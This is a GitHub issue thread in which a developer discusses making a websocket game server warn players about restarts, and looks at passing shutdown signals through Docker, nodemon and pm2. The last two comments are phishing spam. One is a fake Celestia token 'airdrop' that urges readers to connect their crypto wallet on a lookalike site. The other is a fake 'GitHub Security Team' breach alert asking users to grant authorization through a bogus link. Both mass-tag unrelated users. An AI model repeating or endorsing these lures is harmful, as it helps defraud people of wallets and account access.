### ISSUE TITLE
Send server restart message to players

### ISSUE THREAD

**Issue by jonahisadev** [jonahisadev/cubewithme#6]
As a player
When the websocket server restarts
I want to visually see a message indicating a restart was initiated

**Comment by jonahisadev** [comment]
The ideal approach here is for the application to listen to a certain signal (`SIGTERM`, `SIGHUP`, `SIGINT`), and then shutdown all of the rooms. During that process, it would be communicated to the players that the server is restarting for maintenance.

Currently, in the development environment, I'm using `nodemon` to handle watching and restarting the app based on file changes. This is running within docker. So it goes Docker => Nodemon => WebSocket server. In order to test this, I have to send a kill signal to Docker. This can be achieved by either `^C` the `docker compose up` script, or `docker compose down` both of which it seems sends a `SIGTERM` to the child process, Nodemon. For whatever reason, it seems that nodemon doesn't want to pass this signal down to the server.

I think what needs to be done is change from nodemon to pm2, and see if there are any improvements there. Testing will need to be done. If this success, I will likely transition from `forever` to `pm2` in production.

I'm confident that in the production environment (where docker is not in use) that this would be trivial. But without being able to test it locally, I can't confirm that it's working.

**Comment by Obasoro** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!n3a9, @ShawnXiee, @mrentropy, @luminixx, @seb86, @jxom, @jwjeon, @vhbsouza, @maeldd, @cykor, @shkm, @vodknuckles, @sdan, @johnpaulada, @laptrinhvui000, @waako, @gczh, @sgvictorino, @benasse, @jessejones

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
smithbm2316, @Romain, @leonardomso, @andrewluetgers, @tinhhandsome, @kunalbotla, @parthw1, @pasqualedesario, @sdan, @hjools, @jcampbell05, @Skyth3r, @xCuzImPro, @vanilladrop, @2-0-4, @valdotdev, @vf2e, @astamatto, @huuyafwww, @sameerkat
